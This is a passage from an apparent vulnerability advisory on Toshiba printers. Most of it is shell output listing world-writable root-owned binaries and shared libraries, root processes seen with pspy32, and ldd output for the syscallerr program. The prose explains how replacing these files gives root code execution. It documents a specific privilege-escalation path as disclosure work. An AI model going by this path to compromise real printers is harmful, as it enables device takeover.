6 02:15<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/almailboxapplication<br \/>-rwxrwxrwx 1 root root 4674491 Dec 6 03:32<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/almaintenanceplugin<br \/>-rwxrwxrwx 1 root root 2339610 Dec 6 02:25<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alnfcplugin<br \/>-rwxrwxrwx 1 root root 743285 Dec 6 01:53<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alnsm<br \/>-rwxrwxrwx 1 root root 740586 Dec 6 03:45<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alpanel<br \/>-rwxrwxrwx 1 root root 292667 Dec 6 02:21<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alpdlfiltermanager<br \/>-rwxrwxrwx 1 root root 387749 Dec 6 02:22<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alpresentationresourcemgr<br \/>-rwxrwxrwx 1 root root 1314049 Dec 6 01:52<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alprintmn<br \/>-rwxrwxrwx 1 root root 2360596 Dec 6 03:22<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alreportmanager<br \/>-rwxrwxrwx 1 root root 595735 Dec 6 03:21<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alreportsmsgr<br \/>-rwxrwxrwx 1 root root 1367678 Dec 6 02:19<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alrestrictionmode<br \/>-rwxrwxrwx 1 root root 1253012 Dec 6 02:21<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alrolemgr<br \/>-rwxrwxrwx 1 root root 2272202 Dec 6 02:18<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alsecurityconfiguration<br \/>-rwxrwxrwx 1 root root 972621 Dec 6 03:52<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alsharedprintDp<br \/>-rwxrwxrwx 1 root root 1060254 Dec 6 02:13<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alsoftwareupdateclient<br \/>-rwxrwxrwx 1 root root 1711439 Dec 6 02:25<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alulm<br \/>-rwxrwxrwx 1 root root 612467 Dec 6 02:18<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alusbmscapplication<br \/>-rwxrwxrwx 1 root root 3759736 Dec 6 02:17<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/aluserAuthMgr<br \/>-rwxrwxrwx 1 root root 2874311 Dec 6 02:20<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alusermgr<br \/>-rwxrwxrwx 1 root root 899734 Dec 6 01:53<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alwsdiscovery<br \/>-rwxrwxrwx 1 root root 809391 Dec 6 01:53<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alwsmex<br \/>-rwxrwxrwx 1 root root 3782642 Dec 6 01:55<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alwsprint<br \/>-rwxrwxrwx 1 root root 4271522 Dec 6 01:56<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alwsscanner<br \/>-rwxrwxrwx 1 root root 355919 Dec 6 03:53<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/armn<br \/>-rwxrwxrwx 1 root root 18113 Dec 6 01:42<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/cipollproc<br \/>-rwxrwxrwx 1 root root 71587 Dec 6 01:42<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/ciprioritymanager<br \/>-rwxrwxrwx 1 root root 445362 Dec 6 01:42<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/cischeduler<br \/>-rwxrwxrwx 1 root root 532898 Dec 6 01:42<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/cissm<br \/>-rwxrwxrwx 1 root root 508004 Dec 6 01:48<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/cisystemresourcemanager<br \/>-rwxrwxrwx 1 root root 501163 Dec 6 04:16<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/cpe<br \/>-rwxrwxrwx 1 root root 1016124 Dec 6 04:39<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/de_ipfax<br \/>-rwxrwxrwx 1 root root 303779 Dec 6 04:16<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/dem<br \/>-rwxrwxrwx 1 root root 622110 Dec 6 04:16<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/dim<br \/>-rwxrwxrwx 1 root root 12229927 Dec 6 04:44<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/ebx_dl<br \/>-rwxrwxrwx 1 root root 1649127 Dec 6 04:02<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/informationservice<br \/>-rwxrwxrwx 1 root root 1257189 Dec 6 04:01<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/notificationservice<br \/>-rwxrwxrwx 1 root root 426167 Dec 6 04:14<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/pipeMN<br \/>-rwxrwxrwx 1 root root 269419 Dec 6 04:02<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/sim<br \/>-rwxrwxrwx 1 root root 258577 Dec 6 04:02<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/sljobmanagement<br \/>-rwxrwxrwx 1 root root 32089 Mar 14 16:28<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/ssdktimestamp<br \/>-rwxrwxrwx 1 root root 5986687 Dec 6 04:07<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/wfpc<br \/>-rwxrwxrwx 1 root root 78627 Dec 6 02:00 \/home\/SYSROM_SRC\/bin\/alllmnr<br \/>-rwxrwxrwx 1 root root 68223 Dec 6 01:57<br \/>\/home\/SYSROM_SRC\/bin\/dnsValidateDaemon<br \/>-rwxrwxrwx 1 root root 104184 Dec 6 01:48<br \/>\/home\/SYSROM_SRC\/bin\/eBXDebugLogUtility<br \/>-rwxrwxrwx 1 root root 76674 Dec 6 02:01 \/home\/SYSROM_SRC\/bin\/ipv6_daemon<br \/>-rwxrwxrwx 1 root root 28318 Dec 6 01:40 \/home\/SYSROM_SRC\/bin\/mapper<br \/>-rwxrwxrwx 1 root root 167219 Dec 6 01:48 \/home\/SYSROM_SRC\/bin\/syscallerr<br \/>-rwxrwxrwx 1 root root 316382 Dec 6 02:03<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/aleSCL<br \/>-rwxrwxrwx 1 root root 21142 Dec 6 02:01<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alftpprintd<br \/>-rwxrwxrwx 1 root root 243145 Dec 6 01:53<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alhp9100<br \/>-rwxrwxrwx 1 root root 84257 Dec 6 01:56<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/allld2d<br \/>-rwxrwxrwx 1 root root 270934 Dec 6 01:53<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/allprng<br \/>-rwxrwxrwx 1 root root 389522 Dec 6 02:02<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alnetefiRemoteifsr<br \/>-rwxrwxrwx 1 root root 15176259 Dec 6 03:39<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alstage2<br \/>-rwxrwxrwx 1 root root 126466 Dec 6 02:01<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alusbPrint<br \/>-rwxrwxrwx 1 root root 1419229 Dec 6 02:01<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/faxmilter<br \/>-rwxrwxrwx 1 root root 21638 Dec 6 03:28<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/snmp_watchdog<br \/>-rwxrwxrwx 1 apache messagebus 656546 Dec 6 01:34 \/usr\/local\/ebx\/bin\/httpd<br \/>-rwxrwxrwx 1 apache messagebus 665612 Dec 6 01:34<br \/>\/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker<\/p>\n<p>The previous command lists symbolic links that we can analyze, and we<br \/>can confirm they are also vulnerable due to insecure permissions:<\/p>\n<p>lrwxrwxrwx 1 root root 35 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/bin\/dibbler-client -&gt;<br \/>..\/..\/thirdparty\/bin\/dibbler-client<br \/>lrwxrwxrwx 1 root root 26 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alipp -&gt; ..\/..\/thirdparty\/bin\/alipp<br \/>lrwxrwxrwx 1 root root 39 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/mDNSResponderPosix -&gt;<br \/>..\/..\/thirdparty\/bin\/mDNSResponderPosix<br \/>lrwxrwxrwx 1 root root 25 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/nqcs -&gt; ..\/..\/thirdparty\/bin\/nqcs<br \/>lrwxrwxrwx 1 root root 25 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/nqnd -&gt; ..\/..\/thirdparty\/bin\/nqnd<br \/>lrwxrwxrwx 1 root root 30 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/slapd -&gt;<br \/>..\/..\/thirdparty\/libexec\/slapd<br \/>lrwxrwxrwx 1 root root 27 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/snmpd -&gt;<br \/>..\/..\/thirdparty\/sbin\/snmpd<br \/>lrwxrwxrwx 1 root root 27 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/vsftpd -&gt;<br \/>..\/..\/thirdparty\/bin\/vsftpd<br \/>lrwxrwxrwx 1 root root 27 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/python -&gt;<br \/>..\/..\/thirdparty\/bin\/python<\/p>\n<p>bash-4.1# for i in dibbler-client alipp mDNSResponderPosix nqcs<br \/>nqnd vsftpd python; do ls -la<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/$i;done<br \/>-rwxrwxrwx 1 root root 11339780 Dec 6 01:38<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/dibbler-client<br \/>-rwxrwxrwx 1 apache messagebus 653763 Dec 6 01:40<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/alipp<br \/>-rwxrwxrwx 1 root root 429709 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/mDNSResponderPosix<br \/>-rwxrwxrwx 1 apache messagebus 1342015 Dec 6 01:35<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/nqcs<br \/>-rwxrwxrwx 1 apache messagebus 501752 Dec 6 01:35<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/nqnd<br \/>-rwxrwxrwx 1 root root 232030 Dec 6 01:34<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/vsftpd<br \/>lrwxrwxrwx 1 root root 7 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/python -&gt; python3<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/thirdparty\/libexec\/slapd<br \/>-rwxrwxrwx 1 root root 1709140 Dec 6 01:34<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/libexec\/slapd<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/thirdparty\/sbin\/snmpd<br \/>-rwxrwxrwx 1 apache messagebus 41801 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/sbin\/snmpd<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/release\/bin\/python3<br \/>lrwxrwxrwx 1 root root 28 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/python3 -&gt;<br \/>..\/..\/thirdparty\/bin\/python3<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/python3<br \/>lrwxrwxrwx 1 root root 9 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/python3 -&gt; python3.5<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/python3.5<br \/>-rwxrwxrwx 1 root root 20997 Dec 6 01:28<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/python3.5<br \/>bash-4.1#<\/p>\n<p>An attacker can remotely compromise any Toshiba printer.<\/p>\n<p>The programs can be replaced by malicious programs by any local or<br \/>remote attacker.<\/p>\n<p>## Details &#8211; Local Privilege Escalation and Remote Code Execution<br \/>using insecure permissions for libraries<\/p>\n<p>Some vendor-specific programs are running inside Toshiba printers.<br \/>These programs run as root and use code from libraries that have<br \/>insecure permissions (777) allowing an attacker to replace these<br \/>libraries with malicious ones. This Local Privilege Escalation can be<br \/>also exploited as a Remote Code Execution by uploading a malicious<br \/>library using the Pre-authenticated Remote Code Execution as root or<br \/>apache and multiple Local Privilege Escalations vulnerability.<\/p>\n<p>For example, the `\/home\/SYSROM_SRC\/bin\/syscallerr` program runs<br \/>regularly as root:<\/p>\n<p>### Example with `\/home\/SYSROM_SRC\/bin\/syscallerr`:<\/p>\n<p>Output of `pspy32`, where we can see `\/home\/SYSROM_SRC\/bin\/syscallerr`<br \/>running regularly as root:<\/p>\n<p>2023\/05\/27 16:13:35 CMD: UID=0 PID=31370 | sh -c du -cb<br \/>\/work\/log\/corefiles\/core.* 2&gt; \/dev\/null | grep total | awk &#8216;{print<br \/>$1}&#8217;<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31373 | sh -c du -cb<br \/>\/work\/log\/corefiles\/core.* 2&gt; \/dev\/null | grep total | awk &#8216;{print<br \/>$1}&#8217;<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31372 | grep total<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31371 | sh -c du -cb<br \/>\/work\/log\/corefiles\/core.* 2&gt; \/dev\/null | grep total | awk &#8216;{print<br \/>$1}&#8217;<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31374 |<br \/>\/home\/SYSROM_SRC\/bin\/syscallerr<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31376 | awk {print}<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31375 |<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31377 | sh -c ps -e | grep ebx_dl<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31379 | grep ebx_dl<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31378 | ps -e<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31380 |<br \/>\/home\/SYSROM_SRC\/bin\/syscallerr<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31383 | sh -c ps -e |<br \/>grep ebx_dl | awk &#8216;{print $5}&#8217;<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31382 |<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31381 | ps -e<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31384 | sh -c ps -e | grep cissm<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31386 | grep cissm<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31385 | ps -e<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31387 | sh -c dd<br \/>if=\/dev\/mtdblock1 of=\/ramdisk\/FROM_SERIAL &gt; \/dev\/null 2&gt;&amp;1<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31388 | dd<br \/>if=\/dev\/mtdblock1 of=\/ramdisk\/FROM_SERIAL<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31389 | sh -c ps -e | grep ebx_dl<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31391 | grep ebx_dl<\/p>\n<p>When analyzing this program, we can find several shared libraries that<br \/>will be loaded &#8211; their code will be executed as root.<\/p>\n<p>We can find the previously vulnerable shared libraries defined with LD_PRELOAD:<\/p>\n<p>&#8211; &#8211; `\/ramdisk\/al\/libGetNameInfoInterface.so`<br \/>&#8211; &#8211; `\/ramdisk\/al\/libGetAddtInfoInterface.so`<\/p>\n<p>We can also find several libraries that are being loaded:<\/p>\n<p>bash-4.1# ldd \/home\/SYSROM_SRC\/bin\/syscallerr<br \/>linux-gate.so.1 =&gt; (0x777c0000)<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so (0x777b1000)<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so (0x777a0000)<br \/>libpthread.so.0 =&gt; \/lib\/libpthread.so.0 (0x77780000)<br \/>libsqlite3.so.0 =&gt; \/usr\/lib\/libsqlite3.so.0 (0x4be4c000)<br \/>libciindexeddb.so =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libciindexeddb.so (0x77729000)<br \/>libsyscallerr.so =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libsyscallerr.so (0x77720000)<br \/>libcios.so =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcios.so (0x776ad000)<br \/>libatawrapper.so.0 =&gt; \/mfp\/lib\/libatawrapper.so.0 (0x7768b000)<br \/>libmfpcommonwrapper.so.0 =&gt;<br \/>\/mfp\/lib\/libmfpcommonwrapper.so.0 (0x77682000)<br \/>libcrypto.so.1.0.0 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcrypto.so.1.0.0 (0x77420000)<br \/>libstdc++.so.6 =&gt; \/usr\/lib\/libstdc++.so.6 (0x4c04f000)<br \/>libgcc_s.so.1 =&gt; \/lib\/libgcc_s.so.1 (0x4c14b000)<br \/>libintlc.so.5 =&gt; \/usr\/lib\/libintlc.so.5 (0x773c3000)<br \/>libsvml.so =&gt; \/mfp\/lib\/libsvml.so (0x76ba9000)<br \/>libc.so.6 =&gt; \/lib\/libc.so.6 (0x4bc67000)<br \/>libdl.so.2 =&gt; \/lib\/libdl.so.2 (0x4bdaf000)<br \/>libllmnrclient.so =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libllmnrclient.so (0x76b95000)<br \/>\/lib\/ld-linux.so.2 (0x4bc47000)<br \/>libsqlite.so.0 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libsqlite.so.0 (0x76b35000)<br \/>libcpanel.so.0 =&gt; \/mfp\/lib\/libcpanel.so.0 (0x76b0e000)<br \/>libcimsg.so =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcimsg.so (0x76b02000)<br \/>libcissmclient.so =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcissmclient.so (0x76ae8000)<br \/>libacl.so.1 =&gt; \/lib\/libacl.so.1 (0x4bdd7000)<br \/>librt.so.1 =&gt; \/lib\/librt.so.1 (0x4be15000)<br \/>libm.so.6 =&gt; \/lib\/libm.so.6 (0x76abf000)<br \/>libssdk.so.0 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libssdk.so.0 (0x75f1e000)<br \/>libcihdb.so =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcihdb.so (0x75e56000)<br \/>libattr.so.1 =&gt; \/lib\/libattr.so.1 (0x4bdd0000)<br \/>libpam.so.0 =&gt; \/lib\/libpam.so.0 (0x75e4a000)<br \/>libldap-2.4.so.2 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libldap-2.4.so.2 (0x75e12000)<br \/>libssl.so.1.0.0 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libssl.so.1.0.0 (0x75da6000)<br \/>libk5crypto.so.3 =&gt; \/usr\/lib\/libk5crypto.so.3 (0x75d84000)<br \/>libresolv.so.2 =&gt; \/lib\/libresolv.so.2 (0x4c164000)<br \/>libext2fs.so.2 =&gt; \/usr\/lib\/libext2fs.so.2 (0x75d5a000)<br \/>libuuid.so.1 =&gt; \/usr\/lib\/libuuid.so.1 (0x4be0f000)<br \/>libkrb5support.so.0 =&gt; \/usr\/lib\/libkrb5support.so.0 (0x75d53000)<br \/>libkrb5.so.25 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libkrb5.so.25 (0x75ce2000)<br \/>libgssapi.so.2 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libgssapi.so.2 (0x75cae000)<br \/>libCryptolib.so.0 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libCryptolib.so.0 (0x75c2b000)<br \/>libirng.so =&gt; \/usr\/lib\/libirng.so (0x75c22000)<br \/>libcilkrts.so.5 =&gt; \/usr\/lib\/libcilkrts.so.5 (0x75bee000)<br \/>libexpat.so.1 =&gt; \/usr\/lib\/libexpat.so.1 (0x4c403000)<br \/>libcrypt.so.1 =&gt; \/lib\/libcrypt.so.1 (0x75bbc000)<br \/>liblber-2.4.so.2 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/liblber-2.4.so.2 (0x75bb0000)<br \/>libsasl2.so.2 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libsasl2.so.2 (0x75b8c000)<br \/>libcom_err.so.2 =&gt; \/usr\/lib\/libcom_err.so.2 (0x4bdee000)<br \/>libhx509.so.5 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libhx509.so.5 (0x75b4b000)<br \/>libheimsqlite.so.0 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libheimsqlite.so.0 (0x75ad7000)<br \/>libhcrypto.so.4 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libhcrypto.so.4 (0x75aa4000)<br \/>libasn1.so.8 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libasn1.so.8 (0x75a02000)<br \/>libwind.so.0 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libwind.so.0 (0x759da000)<br \/>libcom_err.so.1 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcom_err.so.1 (0x759d6000)<br \/>libroken.so.18 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libroken.so.18 (0x759c2000)<br \/>libheimntlm.so.0 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libheimntlm.so.0 (0x759bc000)<br \/>bash-4.1#<\/p>\n<p>We can find these 31 insecure libraries:<\/p>\n<p>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libciindexeddb.so.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libsyscallerr.so.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libcios.so.0<br \/>&#8211; &#8211; \/mfp\/lib\/libatawrapper.so.0.0<br \/>&#8211; &#8211; \/mfp\/lib\/libmfpcommonwrapper.so.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libcrypto.so.1.0.0<br \/>&#8211; &#8211; \/mfp\/lib\/libsvml.so<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libllmnrclient.so.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libsqlite.so.0.8.6<br \/>&#8211; &#8211; \/mfp\/lib\/libcpanel.so.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libcimsg.so.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libsqlite.so.0.8.6<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libcimsg.so.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libcissmclient.so.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libssdk.so.0.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libcihdb.so.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libldap-2.4.so.2.5.6<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libssl.so.1.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libgssapi.so.2.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libkrb5.so.25.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/NoBuildItems\/common\/lib\/libCryptolib.so.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/NoBuildItems\/common\/lib\/libCryptolib.so.0.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/liblber-2.4.so.2.5.6<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libhx509.so.5.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libheimsqlite.so.0.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libhcrypto.so.4.1.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libasn1.so.8.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libwind.so.0.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libcom_err.so.1.1.3<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libroken.so.18.1.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libheimntlm.so.0.1.0<\/p>\n<p>The permissions of these libraries are insecure. A remote attacker can<br \/>overwrite them and achieve Remote Code Execution:<\/p>\n<p>-rwxrwxrwx 1 root root 322261 Dec 6 01:41<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libciindexeddb.so.0<br \/>-rwxrwxrwx 1 root root 343680 Dec 6 01:48<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libsyscallerr.so.0<br \/>-rwxrwxrwx 1 root root 566991 Dec 6 01:41<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcios.so.0<br \/>-rwxrwxrwx 1 root root 139986 Sep 19 2019 \/mfp\/lib\/libatawrapper.so.0.0<br \/>-rwxrwxrwx 1 root root 38330 May 28 2019<br \/>\/mfp\/lib\/libmfpcommonwrapper.so.0.0<br \/>-rwxrwxrwx 1 apache messagebus 2765203 Dec 6 01:28<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libcrypto.so.1.0.0<br \/>-rwxrwxrwx 1 root root 9479623 Apr 25 2014 \/mfp\/lib\/libsvml.so<br \/>-rwxrwxrwx 1 root root 95211 Dec 6 02:00<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libllmnrclient.so.0<br \/>-rwxrwxrwx 1 root root 744984 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libsqlite.so.0.8.6<br \/>-rwxrwxrwx 1 root root 48131 Apr 8 2019 \/mfp\/lib\/libcpanel.so.0.0<br \/>-rwxrwxrwx 1 root root 58976 Dec 6 01:41<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcimsg.so.0<br \/>-rwxrwxrwx 1 root root 744984 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libsqlite.so.0.8.6<br \/>-rwxrwxrwx 1 root root 58976 Dec 6 01:41<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcimsg.so.0<br \/>-rwxrwxrwx 1 root root 127850 Dec 6 01:41<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcissmclient.so.0<br \/>-rwxrwxrwx 1 root root 14101772 Dec 6 01:40<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libssdk.so.0.0.0<br \/>-rwxrwxrwx 1 root root 909064 Dec 6 01:41<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcihdb.so.0<br \/>-rwxrwxrwx 1 root root 269392 Dec 6 01:34<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libldap-2.4.so.2.5.6<br \/>-rwxrwxrwx 1 apache messagebus 485480 Dec 6 01:28<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libssl.so.1.0.0<br \/>-rwxrwxrwx 1 root root 251701 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libgssapi.so.2.0.0<br \/>-rwxrwxrwx 1 root root 539700 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libkrb5.so.25.0.0<br \/>-rwxrwxrwx 1 root root 624082 Dec 6 04:53<br \/>\/home\/SYSROM_SRC\/NoBuildItems\/common\/lib\/libCryptolib.so.0<br \/>-rwxrwxrwx 1 root root 624082 Apr 20 2018<br \/>\/home\/SYSROM_SRC\/NoBuildItems\/common\/lib\/libCryptolib.so.0.0.0<br \/>-rwxrwxrwx 1 root root 60708 Dec 6 01:34<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/liblber-2.4.so.2.5.6<br \/>-rwxrwxrwx 1 root root 324233 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libhx509.so.5.0.0<br \/>-rwxrwxrwx 1 root root 525228 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libheimsqlite.so.0.0.0<br \/>-rwxrwxrwx 1 root root 225346 Dec 6 01:27<br 